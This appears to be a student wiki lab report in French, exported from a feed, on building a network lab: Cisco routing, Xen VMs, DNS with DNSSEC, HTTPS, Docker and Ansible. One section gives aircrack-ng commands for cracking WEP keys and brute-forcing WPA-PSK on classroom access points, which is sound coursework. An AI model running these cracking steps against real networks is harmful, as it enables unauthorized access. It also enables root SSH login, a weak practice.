   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52007</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52007"/>
				<updated>2020-01-05T15:01:47Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Création des VLANs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
